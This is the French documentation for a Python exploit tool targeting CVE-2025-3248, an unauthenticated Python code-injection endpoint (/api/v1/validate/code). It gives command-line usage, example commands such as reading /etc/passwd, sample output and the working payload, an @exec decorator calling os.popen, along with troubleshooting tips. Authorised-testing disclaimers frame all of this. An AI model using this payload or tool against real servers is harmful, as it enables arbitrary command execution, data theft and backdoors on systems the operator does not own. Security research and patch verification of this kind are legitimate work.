
Exploit pour CVE-2025-3248 : injecte des charges utiles Python conçues dans un point de terminaison d'API de code non authentifié afin d'exécuter des commandes arbitraires sur le serveur cible.
CVE-2025-3248 - Documentation de l'outil d'exploitation
Cet outil est utilisé pour exploiter la vulnérabilité CVE-2025-3248 (injection de code Python), en construisant une charge utile malveillante pour exécuter des commandes à distance (RCE) sur le serveur cible. La vulnérabilité existe dans un point d'API Web, permettant à l'attaquant d'injecter du code Python arbitraire via un point d'exécution non vérifié.
Avertissement important :
Cet outil est destiné uniquement aux tests de sécurité autorisés. Les tests d'intrusion non autorisés peuvent enfreindre les lois. Assurez-vous de disposer d'une autorisation explicite pour le système cible.
/api/v1/validate/codewhoami, ls)python cve-2025-3248.py -t <cible_URL> -c "<commande>" [options]
| Paramètre | Obligatoire | Description |
|---|---|---|
-t, --target | Oui | URL cible (format : http://ip:port) |
-c, --command | Oui | Commande système à exécuter (doit être entre guillemets) |
-o, --output | Non | Format de sortie (text/json, text par défaut) |
--timeout | Non | Délai d'attente de la requête (secondes, 10 par défaut) |
-v, --verbose | Non | Afficher les journaux d'exécution détaillés |
whoami (format de sortie par défaut)python cve-2025-3248.py -t http://192.168.1.100:7860 -c "whoami"
Exemple de sortie :
[+] 命令执行成功
--------------------------------------------------
www-data
--------------------------------------------------
python cve-2025-3248.py -t https://app.example.com -c "cat /etc/passwd" -o json -v
Exemple de sortie :
{
"status": 200,
"content": "root:x:0:0:root:/root:/bin/bash\n...",
"success": true
}
code via l'interface /api/v1/validate/codeexec() pour exécuter le code Python soumisimport os
@exec("raise Exception(os.popen('whoami').read())")
def f():
pass
os.popen() pour exécuter la commande systèmeRisque de la vulnérabilité : Elle permet un contrôle total du serveur, l'exécution de commandes système arbitraires, le vol de données sensibles, l'installation de portes dérobées, etc.
⚠️ Cet outil est réservé aux tests d'intrusion autorisés ⚠️
Recommandations :
-v pour afficher les journaux détaillés et éviter les erreursrequests (doit être installée au préalable)pip install requests
| Code d'erreur | Cause | Solution |
|---|---|---|
[-] URL cible invalide | L'URL ne comporte pas de schéma ou d'hôte | Vérifier le format de l'URL (ex : http://127.0.0.1:8080) |
[-] Délai d'attente dépassé | La cible ne répond pas à temps | Augmenter la valeur de --timeout |
[-] Erreur de connexion | Cible inaccessible / pare-feu bloquant | Vérifier la connectivité réseau |
[-] Échec de l'exécution de la commande - Code HTTP 403 | Refus d'autorisation du serveur | Confirmer que le service cible autorise l'exécution de code |
/api/v1/validate/codeexec, eval, etc.)Ce document est destiné uniquement à des fins de recherche en sécurité et d'éducation. L'auteur décline toute responsabilité directe ou indirecte liée à l'utilisation de cet outil. Veuillez respecter les lois et utiliser les outils de sécurité de manière légale.